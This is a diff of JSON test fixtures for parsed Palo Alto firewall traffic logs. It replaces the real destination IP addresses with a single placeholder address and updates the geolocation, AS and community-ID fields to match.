+ "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -58,7 +60,7 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "184.51.253.152"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "tcp-fin",
@@ -80,7 +82,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:D1fZ8H3SfYS5p3yDzVdiwbnGJlU="
+ "community_id": "1:sKYRL+yp3SWr5aT5SC1cvyWNnnM="
 }
 },
 "sequence_number": 32091112,
@@ -100,8 +102,8 @@
 ],
 "network": {
 "community_id": [
- "1:MhgXJlTEvCKgoyqMC+Xo7qMVGqc=",
- "1:D1fZ8H3SfYS5p3yDzVdiwbnGJlU="
+ "1:La5Jgm/PJBlaHF8BtgJSyZEmW9E=",
+ "1:sKYRL+yp3SWr5aT5SC1cvyWNnnM="
 ],
 "transport": "tcp",
 "application": "apple-maps",
@@ -141,14 +143,14 @@
 ],
 "ip": [
 "192.168.15.207",
- "184.51.253.152",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 586000000000,
- "ingested": "2021-09-08T12:40:05.941767004Z",
- "original": "Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,184.51.253.152,192.168.1.63,184.51.253.152,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031440300Z",
+ "original": "Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:07.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -171,27 +173,29 @@
 "destination": {
 "nat": {
 "port": 0,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 0,
 "bytes": 588,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 6
 },
 "rule": {
@@ -210,7 +214,7 @@
 "packets": 6,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -225,7 +229,7 @@
 "destination": {
 "nat": {
 "port": 0,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -299,14 +303,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.941787632Z",
- "original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031448500Z",
+ "original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:09.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -329,30 +333,29 @@
 "destination": {
 "nat": {
 "port": 80,
- "ip": "17.253.3.202"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-TX",
- "city_name": "Dallas",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Texas",
+ "region_name": "Jilin",
 "location": {
- "lon": -96.8217,
- "lat": 32.7787
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 6185,
+ "number": 4837,
 "organization": {
- "name": "Apple Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
 "bytes": 1035,
- "ip": "17.253.3.202",
+ "ip": "175.16.199.1",
 "packets": 5
 },
 "rule": {
@@ -371,7 +374,7 @@
 "packets": 6,
 "ip": "192.168.15.207"
 },
- "message": "192.168.15.207,17.253.3.202,192.168.1.63,17.253.3.202,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -386,7 +389,7 @@
 "destination": {
 "nat": {
 "port": 80,
- "ip": "17.253.3.202"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "tcp-fin",
@@ -408,7 +411,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:VnGCPYRgvHZCFJBmPOwtCg7/sMY="
+ "community_id": "1:JSXHhU7ufIJpIpsd+sxEq1u12as="
 }
 },
 "sequence_number": 32091114,
@@ -428,8 +431,8 @@
 ],
 "network": {
 "community_id": [
- "1:L9wP4JYo+V/38JhXYBMQf/hWYoQ=",
- "1:VnGCPYRgvHZCFJBmPOwtCg7/sMY="
+ "1:YZ7d7dfaV17GR6zb5Ykfbi10bg8=",
+ "1:JSXHhU7ufIJpIpsd+sxEq1u12as="
 ],
 "transport": "tcp",
 "application": "web-browsing",
@@ -469,14 +472,14 @@
 ],
 "ip": [
 "192.168.15.207",
- "17.253.3.202",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 1000000000,
- "ingested": "2021-09-08T12:40:05.941791705Z",
- "original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,17.253.3.202,192.168.1.63,17.253.3.202,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031454100Z",
+ "original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:09.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -499,27 +502,29 @@
 "destination": {
 "nat": {
 "port": 0,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 0,
 "bytes": 588,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 6
 },
 "rule": {
@@ -538,7 +543,7 @@
 "packets": 6,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -553,7 +558,7 @@
 "destination": {
 "nat": {
 "port": 0,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -627,14 +632,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.941795286Z",
- "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031459500Z",
+ "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:15.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -657,30 +662,29 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "216.58.194.99"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Mountain View",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "California",
+ "region_name": "Jilin",
 "location": {
- "lon": -122.0839,
- "lat": 37.3861
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
 "bytes": 1613,
- "ip": "216.58.194.99",
+ "ip": "175.16.199.1",
 "packets": 3
 },
 "rule": {
@@ -699,7 +703,7 @@
 "packets": 5,
 "ip": "192.168.15.196"
 },
- "message": "192.168.15.196,216.58.194.99,192.168.1.63,216.58.194.99,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -714,7 +718,7 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "216.58.194.99"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -736,7 +740,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:pvg9sIAzBs2eyqMclcdCIYEBO1Q=" + "community_id": "1:XJ9PhQOk/jmjsoXn6dQsdlduInU=" } }, "sequence_number": 32091116, @@ -756,8 +760,8 @@ ], "network": { "community_id": [ - "1:bfDHy9SG4Mhm/ohGXQNZR3yF5sI=", - "1:pvg9sIAzBs2eyqMclcdCIYEBO1Q=" + "1:M11jrJsZl7Ilam8qmRVtfDCAAx4=", + "1:XJ9PhQOk/jmjsoXn6dQsdlduInU=" ], "transport": "udp", "application": "quic", @@ -797,14 +801,14 @@ ], "ip": [ "192.168.15.196", - "216.58.194.99", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941798942Z", - "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,216.58.194.99,192.168.1.63,216.58.194.99,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031465Z", + "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:15.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -827,27 +831,29 @@ "destination": { "nat": { "port": 443, - "ip": "209.234.224.22" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 395162, + "number": 4837, "organization": { - "name": "Markit On Demand, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 21111, - "ip": "209.234.224.22", + "ip": "175.16.199.1", "packets": 51 }, "rule": { @@ -866,7 +872,7 @@ "packets": 62, "ip": "192.168.15.224" }, - "message": "192.168.15.224,209.234.224.22,192.168.1.63,209.234.224.22,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -881,7 +887,7 @@ "destination": { "nat": { "port": 443, - "ip": "209.234.224.22" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", 
@@ -903,7 +909,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:u81/Ahz4HsL4LAVrUEiPkbXlX9A=" + "community_id": "1:z0M1RJ8MDRCMZUG5Vr95dQNeZuA=" } }, "sequence_number": 32091117, @@ -923,8 +929,8 @@ ], "network": { "community_id": [ - "1:A+0qkq/2rxZS/+I/sm0SFOWOkwY=", - "1:u81/Ahz4HsL4LAVrUEiPkbXlX9A=" + "1:8XhDd/299v16LAbX6rIvW94WUOw=", + "1:z0M1RJ8MDRCMZUG5Vr95dQNeZuA=" ], "transport": "tcp", "application": "ssl", @@ -964,14 +970,14 @@ ], "ip": [ "192.168.15.224", - "209.234.224.22", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 85000000000, - "ingested": "2021-09-08T12:40:05.941802525Z", - "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,209.234.224.22,192.168.1.63,209.234.224.22,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031470500Z", + "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:15.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -994,27 +1000,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 588, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -1033,7 +1041,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -1048,7 +1056,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", 
@@ -1122,14 +1130,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941806024Z", - "original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031475800Z", + "original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:21.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -1152,27 +1160,29 @@ "destination": { "nat": { "port": 443, - "ip": "172.217.2.238" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 3732, - "ip": "172.217.2.238", + "ip": "175.16.199.1", "packets": 9 }, "rule": { 
@@ -1191,7 +1201,7 @@ "packets": 7, "ip": "192.168.15.224" }, - "message": "192.168.15.224,172.217.2.238,192.168.1.63,172.217.2.238,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -1206,7 +1216,7 @@ "destination": { "nat": { "port": 443, - "ip": "172.217.2.238" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -1228,7 +1238,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:DoBKpBbAds/XQwbKPGjMrcuHTGo=" + "community_id": "1:Gf6WAtpxRZADRPARoANhhnel+UM=" } }, "sequence_number": 32091119, @@ -1248,8 +1258,8 @@ ], "network": { "community_id": [ - "1:q1tj6dPFkb+U8mUSdFp3CbUFXUk=", - "1:DoBKpBbAds/XQwbKPGjMrcuHTGo=" + "1:4mNCXkF6149E9UPpN3Cw+1zKeQM=", + "1:Gf6WAtpxRZADRPARoANhhnel+UM=" ], "transport": "udp", "application": "quic", 
